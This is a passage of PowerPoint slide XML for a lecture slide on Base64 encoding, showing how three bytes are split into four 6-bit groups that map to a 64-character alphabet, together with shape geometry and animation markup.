            <a:off x="3680177" y="3544711"/>
            <a:ext cx="234810" cy="952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69" y="14588"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18381" y="14460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="14357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15992" y="17991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12046" y="20474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10281" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9865" y="21267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8619" y="20448"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5192" y="17966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="14332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6023" y="14613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10281" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15369" y="14588"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="793" name="Shape"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6294684" y="3542453"/>
            <a:ext cx="234810" cy="952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69" y="14588"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18381" y="14460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="14357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15992" y="17991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12046" y="20474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10281" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9865" y="21267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8619" y="20448"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5192" y="17966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="14332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6023" y="14613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10281" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15369" y="14588"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="794" name="Shape"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8897902" y="3531164"/>
            <a:ext cx="234810" cy="952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69" y="14588"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18381" y="14460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="14357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15992" y="17991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12046" y="20474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10281" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9865" y="21267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8619" y="20448"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5192" y="17966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="14332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6023" y="14613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10281" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15369" y="14588"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="795" name="Shape"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3309902" y="5594773"/>
            <a:ext cx="234810" cy="952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69" y="14588"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18381" y="14460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="14357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15992" y="17991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12046" y="20474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10281" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9865" y="21267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8619" y="20448"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5192" y="17966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="14332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6023" y="14613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10281" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15369" y="14588"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="796" name="Shape"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5305777" y="5592515"/>
            <a:ext cx="234810" cy="952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69" y="14588"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18381" y="14460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="14357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15992" y="17991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12046" y="20474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10281" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9865" y="21267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8619" y="20448"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5192" y="17966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="14332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6023" y="14613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10281" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15369" y="14588"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="797" name="Shape"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7290364" y="5590257"/>
            <a:ext cx="234810" cy="952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69" y="14588"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18381" y="14460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="14357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15992" y="17991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12046" y="20474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10281" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9865" y="21267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8619" y="20448"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5192" y="17966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="14332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6023" y="14613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10281" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15369" y="14588"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="798" name="Shape"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9270435" y="5592515"/>
            <a:ext cx="234810" cy="952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69" y="14588"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18381" y="14460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="14357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15992" y="17991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12046" y="20474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10281" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9865" y="21267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8619" y="20448"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5192" y="17966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="14332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6023" y="14613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10281" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15369" y="14588"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="799" name="Encode a message of n bytes"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1505937" y="2059093"/>
            <a:ext cx="9992926" cy="575734"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="323850" indent="-323850" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:buSzPct val="70000"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="3400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Encode a message of </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:t> bytes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="800" name="Each block of 6 bits gets mapped to one of the possible 26 = 64 values from…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2205848" y="6685280"/>
            <a:ext cx="8436621" cy="685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400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Each block of 6 bits gets mapped to one of the possible 2</a:t>
            </a:r>
            <a:r>
              <a:rPr baseline="30500"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:t> = 64 values from</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>{A, B, …, Y, Z, a, b, …, y, z, 0, 1, …, 8, 9, +, /}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="801" name="Blue Text Box" descr="Blue Text Box"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2558062" y="2736426"/>
            <a:ext cx="2682241" cy="808286"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="802" name="Blue Text Box" descr="Blue Text Box"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5165795" y="2731911"/>
            <a:ext cx="2682241" cy="808285"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="803" name="Blue Text Box" descr="Blue Text Box"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7780302" y="2745457"/>
            <a:ext cx="2682241" cy="808286"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="804" name="Byte 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7744177" y="2844800"/>
            <a:ext cx="2555806" cy="3429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300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Byte 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="805" name="Byte 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5129670" y="2844800"/>
            <a:ext cx="2553548" cy="3429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300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Byte 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="806" name="Byte 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2497102" y="2844800"/>
            <a:ext cx="2569352" cy="3429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300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Byte 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="809" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2506133" y="4809066"/>
            <a:ext cx="1844605" cy="541868"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1844604" cy="541866"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="807" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1844605" cy="541867"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 4167"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="50800" dir="2700000">
                <a:srgbClr val="AFAFAF"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="808" name="Bit 1 - 6"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="420219" y="34459"/>
              <a:ext cx="1004166"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2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Bit 1 - 6</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="812" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4486204" y="4802293"/>
            <a:ext cx="1844605" cy="541867"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1844604" cy="541866"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="810" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1844605" cy="541867"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 4167"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="50800" dir="2700000">
                <a:srgbClr val="AFAFAF"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="811" name="Bit 7 - 12"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="350716" y="34459"/>
              <a:ext cx="1143172"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2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Bit 7 - 12</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="815" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6468533" y="4802293"/>
            <a:ext cx="1844605" cy="541867"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1844604" cy="541866"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="813" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1844605" cy="541867"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 4167"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="50800" dir="2700000">
                <a:srgbClr val="AFAFAF"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="814" name="Bit 13 - 18"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="281214" y="34459"/>
              <a:ext cx="1282177"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2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Bit 13 - 18</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="818" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8466666" y="4804550"/>
            <a:ext cx="1844606" cy="541868"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1844604" cy="541866"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="816" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1844605" cy="541867"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 4167"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="50800" dir="2700000">
                <a:srgbClr val="AFAFAF"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="817" name="Bit 19 - 24"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="281214" y="34459"/>
              <a:ext cx="1282177"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2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Bit 19 - 24</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806"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="806"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="80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805"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="805"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="80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804"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="804"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="804"/>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801"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="801"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
